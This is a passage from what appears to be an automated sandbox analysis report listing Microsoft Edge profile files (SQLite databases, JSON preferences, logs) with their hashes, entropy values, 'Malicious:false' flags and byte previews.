                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:fK3tjkSdj5IUltGhp22iSBg89Qd4nRqQfKRoR629Oj/:ftSjGhp22iSf9w4nciV98
                                                                                                                                                                                                                                                                                                                                                              MD5:6BB52A7D040402BAC38275C447750466
                                                                                                                                                                                                                                                                                                                                                              SHA1:085858BD9DCE7EABA21A2CF3F48721A13410F7B3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:686F867B3E8FBD3E5519D234A4E685F061A2E0A258B196F14016D9B0E96198AC
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2DA8B120A128EC0EE69620D2BBB1FCC8AC89F86B5E34135F80A2102A0087B4A17CB381563992AA3514291556AF7F0DC5AA538A5C99C1D4ADE7B0BFC2A76E50CC
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.48004813430962684
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBkU:v7doKsKuKZKlZNmu46yjxkU
                                                                                                                                                                                                                                                                                                                                                              MD5:AB130A53B06DF0A79754D5A6C50A9600
                                                                                                                                                                                                                                                                                                                                                              SHA1:E30B72020A8E00ACCB303BEBBC04A9894D0F1636
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2971E402C0C65660C39B251EA565C59E7459F02210346FE5B08B621A2497E66
                                                                                                                                                                                                                                                                                                                                                              SHA-512:66B36B813ED6F41478ABA271A021E0980714705129B8221F608838D96E93F8A5FC8F8DCDD1CBEB5785DC2958F4F5C9AF7BBB1FD36963235E889BD7AA10F55B78
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11755
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b28444af-2b80-4788-bf57-d5de7d0a9518.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23144
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.227544227891499
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:stWPGQSu0sk0Pei4eYbGWQUJ2emxp7KB0AlNnUUtu9ViceQ9Q:sYOXuhPe5PbGlFemxp7KtM9L9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:572CACE5F56830E7FD0D406EB6A6D157
                                                                                                                                                                                                                                                                                                                                                              SHA1:D703090C8D0BC22AB6F238D7A9FF7C2A107775D8
                                                                                                                                                                                                                                                                                                                                                              SHA-256:591F76342489353C180D4E9E5CD09887ACAA3A3E03BAE7B9CA68A114EEA20F48
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D8D1D72615B5224B532CDC01F84D8B005382BEFA32B9107A41BE120CDA138BE39DCCCA70A8F51F943C6FD44B2CA667C7AA6E48C1FC11314983889760442DAE3B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b29df2de-a7fd-4d7d-b410-79ba4a746123.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565703764986323
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:AWDigjWPEmfMn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQ1TIMrwEpUtuL:AWDigjWPEmfMnu1ja1VIlHtU
                                                                                                                                                                                                                                                                                                                                                              MD5:F4CDC587C5A572F0E028004A0D536765
                                                                                                                                                                                                                                                                                                                                                              SHA1:754331ABEB6E81CBD89F24B677A91F37AE97B96D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C41505AECCD27FAD6658C4361D9E70A23A5830A73A1D42D7C5EF13E2DB71CCA4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E036C1855AE6E5403F3450C3EA745A7C4E97C9A0F89931B27E3EED38441361F619E7ED25FDFEF31A115FF75C48FEC6E538752D4A1C0D533552AA3B11AE0826D1
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13384336602746429","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13384336602746429","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c014b379-7dcc-46d7-8886-248e07025fc8.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                                                              MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                                                              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                                                              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\eced8cfc-6155-4d60-8bdc-8d18fc7b852a.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23309
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.226264863175616
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:stWPGQSu0sk0Pei4eYbGWQUJ2emxp7KB0AlNnUUtu9Vicelj9Q:sYOXuhPe5PbGlFemxp7KtM9g9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:2C479E8F1EF7A2968D388058927421FF
                                                                                                                                                                                                                                                                                                                                                              SHA1:200743D63E6C99DE6B0EBDCB0C9F0F3FE8C1B63D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:FC63ECE6AFEAC74B4FB344318CD6FEB0C84F34348F5C8412BD93B422E85223B8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:68671AC436F7CBFF521FDAE6483C46B877ED74DC10FC4DF1D900063F5530F6FA8A5B8A315B5E2920AD60B649749DE170C1399127FAD12D322D7971D1DD60F8E6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f41fa32d-dba5-4e01-9534-9279536c5a1c.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 25, database pages 32, cookie 0x7, schema 4, UTF-8, version-valid-for 25
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.137278071437001
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:zv6KUe6nMvju8CbY36F/MoH5nVrTOQNCooSs223vsW6w:zCK5IMLu8dqTH5nBDSSs22f0w
                                                                                                                                                                                                                                                                                                                                                              MD5:AD7681EE6F1F2E9636FC38F3D6F80996
                                                                                                                                                                                                                                                                                                                                                              SHA1:C0231E4D58587AF1EB3C8E30F82938DB3C7BBF45
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BD9FBE4E0FC759EE1A5FB931943F58CB5116F35CE4178DE0402A6213C62FA612
                                                                                                                                                                                                                                                                                                                                                              SHA-512:34A78A006FA58D56548423A7A25FCC5F2F5DDB0A85D19DF157F837391FA6FE8E5307A3CD500C8A91280BEA5CDBC7B1E6B2FC692E1B19B6D21015C94FE2C127A4
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ....... ..................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3743832779441732
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:XT6TDW5lGlvlFEdrcE9YTxiV1gkq5NAm:qWEE5cEDV+8m
                                                                                                                                                                                                                                                                                                                                                              MD5:756BD832EFD51C818EA3D4AF70F10A97
                                                                                                                                                                                                                                                                                                                                                              SHA1:0D8272C344E250632CC2605E01658EBD59ACBCD8
                                                                                                                                                                                                                                                                                                                                                              SHA-256:88718F38A428C626CC021E91F7BA7CFE26CF798CA19A60B506BDF1D18F97F994
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F075FB3541DF5876E3C8CF2F0A140DE4DBF176DBFF8DFB38F7038DF3ABC3FB5F345AD2F01D88A8CE51AA1CB56A5651C1C909B67CAC955C6244A869C635F3258
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:..-..... .......u..."....._.HP....`......."....-..... .......u..."....._.HP....`......."..........n........................................................................... ........................................... ............................... ........................... ........................................... ............................................... ...!............................... ............................... ............................... ............................... ............... ............................... ............................... ............................... ............... ............................... ........... ...!............................... ............................... ............................................... ............... ............... ............... ............... ............................... ....................................... ............................................... ............... ...

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4124152
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.844628474852971
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:0I9Ajivz+3cKgM9pjRkdKOEs+1lhhMp3Q5YRWBWQt:0I9Ajir+3cKgAD5bswPMp0YRWBWQt
                                                                                                                                                                                                                                                                                                                                                              MD5:9A250034A570011B841F501E0CFE99D0
                                                                                                                                                                                                                                                                                                                                                              SHA1:B8A7662D4C40A363A4CA6F8A6DE1EAFF815D9720
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A415F1D8B316A227C65C918BD4F37F46F7DE7CC74F20F67FD844A2257A17AA08
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F9F72AFFCF90017DCC1D1D6F15AB6B04AB0AAD8712A37B050F71C6509971415154C871A4CB0D6A158EF5A5044600D972EB5CF043D54BA7A118D532C3C8155FA2
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:7....-............`...7....,...........`...M$...J....../......H.........l.B.......e.8.........i.>......._.........p.@.....z...D.......~.@.......z.B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):675
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7121139916793844
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:dlc8CdOuuuuuuuuuuuuuu6Zll/H8VtTSlkTSlkTSlkTSlkT:ncvbliU999
                                                                                                                                                                                                                                                                                                                                                              MD5:FAD133708C67BE7CDCABCC8C3528C5FD
                                                                                                                                                                                                                                                                                                                                                              SHA1:A9CA4EEC1E8F15935105A83E0C78E8D080ECA5C3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:E41CFFE2B8D2614A46A1C3CC3E119F494A2652CC4FE574B58D357C659169D7D7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:A2EEEFF5C90BBE6A73C8A2A404D9559D9BBDFD250F452245E5531CDC77D9075577749F91691A2F7EF1346E9B6E74D01217D29D2C37F2D8592EBEA1A47525794F
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:A..r.................20_1_1...1.,U.................20_1_1...1x...0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................C;...............#38_h.......6.Z..W.F..........................V.e................V.e................V.e................v.b50................39_config..........6.....n ....12B.l...............2B.l...............2B.l...............2B.l...............2B.l...............

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.28455721518155
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf3N9+q2PFi23oH+TcwtfrK+IFUtFfsJZmw7fs9VkwOFi23oH+TcwtfrUeLJ:7F9+vdZYeb23FUtKJ/A9V5wZYeb3J
                                                                                                                                                                                                                                                                                                                                                              MD5:DF3A9FB60BC2E4383B24538CF7BBEF4E
                                                                                                                                                                                                                                                                                                                                                              SHA1:44A1679E19F61BFFDB44D08403E9A2DC73ADABC3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:DAC3D2694768D4888769878F40DB759004C405CF2B9ED9E6B683A5836E788B09
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E0960D48AFA6E1F02C3DD4DCE4330CF3D5CE529DC9CF9A44E56B0389C2A5A9FA0F6CCA4B706734A5425BED5BC2CC243E232588C08C5EBF06A792E596AC35F138
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.297 134c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/02/18-02:16:43.298 134c Recovering log #3.2025/02/18-02:16:43.298 134c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
